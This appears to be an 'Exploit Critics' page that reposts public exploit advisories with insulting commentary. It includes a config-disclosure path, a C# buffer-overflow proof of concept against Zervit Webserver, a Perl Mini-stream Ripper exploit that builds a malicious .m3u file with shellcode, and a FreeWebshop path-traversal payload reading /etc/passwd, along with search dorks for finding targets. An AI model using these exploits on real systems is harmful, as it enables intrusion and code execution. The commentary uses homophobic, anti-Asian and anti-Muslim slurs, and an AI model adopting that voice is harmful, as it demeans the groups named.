<> Groups : InjEctOr5 T3am 

=======================================================
+++++++++++++++++++ Script information+++++++++++++++++
=======================================================

<<->> script   :: Job2C

<<->> download :: http://www.w2b.ru/download/Job2C.zip
=======================================================
+++++++++++++++++++++++ Exploit +++++++++++++++++++++++
=======================================================


<<->> Exploit :: Remote Config File Disclosure
 
                >>> http://www.cyb3r.1st/ [path] /conf/conf.inc

=======================================================
++++++++++++++++++++++ Greetz +++++++++++++++++++++++++
=======================================================

<<->> All freinds , all muslims , [ www.tryag.com ] , [ www.7rs.org ] , [ sec-code.com ] , hackteach, and all arabic sites

Audit something thats worth it... but hey, your famous now, faggot!

Zervit Webserver 0.02 Remote Buffer Overflow PoC

Main critism: Write a real fucking exploit you piece of shit. PoC's are soooo soooo lame.



####################  Zervit Webserver 0.02  Buffer Overflow   ############################


############### By:      e.wiZz!

###############Site:   www.balcansecurity.com


############### Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)
           
            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}

Why does milw0rm keep posting this shit?

Mini-stream Ripper 3.0.1.1 .m3u Universal Stack Overflow Exploit

Main critism: this kid obviously sucks a lot of useless software chink cock.


#!/usr/bin/perl
# Mini-stream Ripper Version 3.0.1.1 .m3u Universal Stack Overflow Exploit
# Disoverd By Cyber-Zone
# Exploited By Stack
my $Header = "#EXTM3U\n";
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
my $ex="http://"."A" x 26117;
my $ret="\x1D\xE3\x07\x02"; # Universall Ret Adress and if you want Test it under WinSP2 EN/FR use this >>
   # "\x5D\x38\x82\x7C";
my $nop="\x90" x 20;
open(MYFILE,'>>Mini-stream-Ripper.m3u');
print MYFILE $Header.$ex.$ret.$nop.$shellcode;
close(MYFILE);

Stack is a super lame name. Read "Win32 internals for Dumbasses"

FreeWebshop.org 2.2.9 RC2 (lang_file) Local File Inclusion Vulnerability

Main critism (I wish I had the patience to type more): not even an exploit



            =-=-local file include-=-=

-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=
script::FreeWebshop.org 2..2.9_R2
-------------------------------------------------
Author: ahmadbady

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
download from:http://chaozz.deepunder.dk/released/freewebshop/FreeWebshop.org2.2.9_R2.zip

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=--=-=-=-=-=-=-=-==-=-=
vul: /includes/startmodules.inc.php line 31;

include ("./".$lang_file);

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=
xpl:
/path/includes/startmodules.inc.php?lang_file=.../../../../etc/passwd
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=--=-=-=-=-=-=-

dork:
"FreeWebshop.org | This is the Footer | ©2008-2009"
"FreeWebshop.org | This is the Footer |"

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-

By Ahmedmacabelvi wannabe muslim fuckhead.

Exploit Critics